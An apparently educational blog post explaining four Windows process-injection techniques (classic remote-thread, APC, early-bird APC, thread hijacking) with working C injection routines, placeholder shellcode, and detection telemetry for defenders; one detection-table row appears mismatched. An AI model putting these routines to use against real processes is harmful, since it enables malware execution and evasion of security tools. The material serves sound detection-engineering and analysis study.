A technical reference covering the most common process injection techniques used in Windows malware — VirtualAllocEx/WriteProcessMemory, APC injection, early-bird injection, and thread hijacking. Includes C code, EDR evasion context, and detection points for each technique.

Note: This post is educational. Understanding how injection works is fundamental to detection engineering, malware analysis, and defensive product development.

Overview

Process injection is the mechanism by which code in one process executes in the context of another. Malware uses this to:

  1. Execute from a trusted process (evading application whitelisting)
  2. Access another process’s memory or handles
  3. Hide from simple process enumeration

The Windows API provides numerous primitives that can be combined to achieve injection. We’ll walk through the most prevalent techniques with working C code, then look at what each looks like to a defender.


Technique 1: Classic VirtualAllocEx / WriteProcessMemory

The textbook technique. Widely detected, but still used in commodity malware because it works.

How It Works

  1. Open a handle to the target process with PROCESS_ALL_ACCESS
  2. Allocate RWX memory in the target with VirtualAllocEx
  3. Copy shellcode in with WriteProcessMemory
  4. Create a remote thread at the shellcode address with CreateRemoteThread

Code

#include <windows.h>
#include <stdio.h>

// Placeholder shellcode — replace with real payload
// This is just a NOP sled + INT3 for demonstration
unsigned char shellcode[] = {
    0x90, 0x90, 0x90, 0x90,  // NOP sled
    0xCC                      // INT3 (breakpoint)
};
SIZE_T shellcode_len = sizeof(shellcode);

BOOL inject_classic(DWORD pid) {
    HANDLE hProcess = NULL;
    HANDLE hThread  = NULL;
    LPVOID remote_mem = NULL;
    BOOL   result   = FALSE;

    // Step 1: Open the target process
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) {
        fprintf(stderr, "[-] OpenProcess failed: %lu\n", GetLastError());
        goto cleanup;
    }

    // Step 2: Allocate RWX memory in target
    remote_mem = VirtualAllocEx(
        hProcess,
        NULL,
        shellcode_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!remote_mem) {
        fprintf(stderr, "[-] VirtualAllocEx failed: %lu\n", GetLastError());
        goto cleanup;
    }

    // Step 3: Write shellcode
    SIZE_T bytes_written = 0;
    if (!WriteProcessMemory(hProcess, remote_mem, shellcode, shellcode_len, &bytes_written)) {
        fprintf(stderr, "[-] WriteProcessMemory failed: %lu\n", GetLastError());
        goto cleanup;
    }

    // Step 4: Create remote thread
    hThread = CreateRemoteThread(hProcess, NULL, 0,
        (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);
    if (!hThread) {
        fprintf(stderr, "[-] CreateRemoteThread failed: %lu\n", GetLastError());
        goto cleanup;
    }

    WaitForSingleObject(hThread, INFINITE);
    result = TRUE;
    printf("[+] Injection complete\n");

cleanup:
    if (hThread)  CloseHandle(hThread);
    if (hProcess) CloseHandle(hProcess);
    return result;
}

Detection Fingerprint

API Call Event / Telemetry
OpenProcess Sysmon Event ID 10 (ProcessAccess)
VirtualAllocEx Sysmon Event ID 8 (CreateRemoteThread)
WriteProcessMemory ETW: Microsoft-Windows-Kernel-Process
CreateRemoteThread Sysmon Event ID 8, Windows Event 4688

The RWX allocation is the loudest signal. Most EDRs flag PAGE_EXECUTE_READWRITE allocations in remote processes immediately.


Technique 2: APC Injection

Asynchronous Procedure Calls (APCs) are a Windows mechanism for executing functions in the context of a thread. Every thread has an APC queue; functions queued to it run when the thread enters an alertable wait state.

How It Works

  1. Open the target process and enumerate its threads
  2. Queue an APC to each thread with QueueUserAPC
  3. The APC fires when any thread calls SleepEx, WaitForSingleObjectEx, etc. with bAlertable = TRUE
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

// Find all threads belonging to a process
DWORD* get_thread_ids(DWORD pid, DWORD* count) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snapshot == INVALID_HANDLE_VALUE) return NULL;

    THREADENTRY32 te = { .dwSize = sizeof(THREADENTRY32) };
    DWORD capacity = 64;
    DWORD* tids = (DWORD*)malloc(capacity * sizeof(DWORD));
    *count = 0;

    if (Thread32First(snapshot, &te)) {
        do {
            if (te.th32OwnerProcessID == pid) {
                if (*count >= capacity) {
                    capacity *= 2;
                    tids = (DWORD*)realloc(tids, capacity * sizeof(DWORD));
                }
                tids[(*count)++] = te.th32ThreadID;
            }
        } while (Thread32Next(snapshot, &te));
    }

    CloseHandle(snapshot);
    return tids;
}


BOOL inject_apc(DWORD pid, unsigned char* shellcode, SIZE_T len) {
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) return FALSE;

    // Allocate and write shellcode (same as classic technique)
    LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remote_mem) { CloseHandle(hProcess); return FALSE; }

    SIZE_T written;
    WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);

    // Queue APC to all threads
    DWORD thread_count = 0;
    DWORD* tids = get_thread_ids(pid, &thread_count);

    for (DWORD i = 0; i < thread_count; i++) {
        HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, tids[i]);
        if (hThread) {
            QueueUserAPC((PAPCFUNC)remote_mem, hThread, 0);
            CloseHandle(hThread);
        }
    }

    free(tids);
    CloseHandle(hProcess);

    printf("[+] APC queued to %lu threads in PID %lu\n", thread_count, pid);
    return TRUE;
}

Reliability Problem

APC injection only executes when a thread enters an alertable wait. Many processes never do this on their main threads. The workaround is targeting processes known to use alertable waits (svchost.exe running certain services, explorer.exe, etc.) or using Early-Bird injection below.

Detection Fingerprint

QueueUserAPC is less commonly monitored than CreateRemoteThread. Some EDRs check the APC target address against known-good regions. ETW providers in the Windows kernel emit events for APC queue operations, but most commercial SIEMs don’t collect these by default.


Technique 3: Early-Bird APC Injection

Early-Bird solves the alertable wait problem by creating a suspended process, queuing the APC before it runs any code, then resuming it. The first thing the main thread does on resume is process its APC queue.

BOOL inject_earlybird(const char* target_path, unsigned char* shellcode, SIZE_T len) {
    STARTUPINFOA        si = { .cb = sizeof(si) };
    PROCESS_INFORMATION pi = {0};

    // Create target process in suspended state
    if (!CreateProcessA(
            target_path, NULL, NULL, NULL,
            FALSE,
            CREATE_SUSPENDED,        // <-- key flag
            NULL, NULL, &si, &pi)) {
        fprintf(stderr, "[-] CreateProcess failed: %lu\n", GetLastError());
        return FALSE;
    }

    printf("[*] Created suspended PID: %lu, TID: %lu\n", pi.dwProcessId, pi.dwThreadId);

    // Allocate and write shellcode
    LPVOID remote_mem = VirtualAllocEx(pi.hProcess, NULL, len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remote_mem) {
        TerminateProcess(pi.hProcess, 1);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        return FALSE;
    }

    SIZE_T written;
    WriteProcessMemory(pi.hProcess, remote_mem, shellcode, len, &written);

    // Queue APC to the main thread (it's still suspended)
    QueueUserAPC((PAPCFUNC)remote_mem, pi.hThread, 0);

    // Resume — main thread immediately enters alertable state via ntdll init
    ResumeThread(pi.hThread);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    printf("[+] Early-bird injection complete\n");
    return TRUE;
}

Early-Bird is reliable precisely because the APC fires before the target process’s own initialization code runs. It’s also quieter than CreateRemoteThread, though it does create a new (potentially anomalous) process.


Technique 4: Thread Hijacking (SetThreadContext)

Hijack an existing thread by suspending it, overwriting its instruction pointer, and resuming.

BOOL inject_thread_hijack(DWORD pid, unsigned char* shellcode, SIZE_T len) {
    // Find a suitable thread (not the main thread ideally)
    DWORD thread_count = 0;
    DWORD* tids = get_thread_ids(pid, &thread_count);
    if (!tids || thread_count == 0) return FALSE;

    DWORD  target_tid = tids[0];
    free(tids);

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    HANDLE hThread  = OpenThread(THREAD_ALL_ACCESS, FALSE, target_tid);
    if (!hProcess || !hThread) return FALSE;

    // Suspend the thread
    SuspendThread(hThread);

    // Get current context
    CONTEXT ctx;
    ctx.ContextFlags = CONTEXT_FULL;
    GetThreadContext(hThread, &ctx);

    // Allocate shellcode in target process
    LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    SIZE_T written;
    WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);

    // Redirect instruction pointer to shellcode
#ifdef _WIN64
    ctx.Rip = (DWORD64)remote_mem;
#else
    ctx.Eip = (DWORD)remote_mem;
#endif

    SetThreadContext(hThread, &ctx);

    // Resume thread — it will execute our shellcode
    ResumeThread(hThread);

    CloseHandle(hThread);
    CloseHandle(hProcess);

    printf("[+] Thread %lu hijacked in PID %lu\n", target_tid, pid);
    return TRUE;
}

Limitations

Thread hijacking is noisy on the target process — the hijacked thread’s legitimate work doesn’t complete. If the thread was in the middle of a database query or network request, the process may crash or hang. It also uses SuspendThread + GetThreadContext + SetThreadContext, all of which are monitored by most EDRs.


Comparison Summary

Technique Reliability Noise Level Primary Detection
Classic VirtualAllocEx High High Sysmon EID 8, RWX alloc
APC Injection Medium Medium QueueUserAPC on remote thread
Early-Bird APC High Medium New process + QueueUserAPC
Thread Hijacking Medium-High High SuspendThread + SetThreadContext

Detection Perspective

If you’re building detections, the key behavioral indicators are:

  1. Cross-process memory allocationVirtualAllocEx from a process that isn’t the target
  2. Cross-process writeWriteProcessMemory following a remote allocation
  3. Remote thread creationCreateRemoteThread where the start address is in a heap allocation (not a known module)
  4. APC to remote threadQueueUserAPC where the APC function address is in remote-allocated memory
  5. Suspended process + APCCREATE_SUSPENDED process creation followed quickly by a remote write and QueueUserAPC to the main thread
  6. Context modificationSetThreadContext changing RIP/EIP to an address outside any loaded module

A single event isn’t sufficient — chains of events in sequence within a short time window are what matter. Process activity graphs (BloodHound-style, but for process behavior) are the right tool for catching these patterns.


Further Reading

The Windows Internals series (Yosifovich, Solomon, et al.) covers APC mechanics in detail. For detection engineering, the Elastic Detection Rules repository is a good reference for how these techniques translate to detection logic.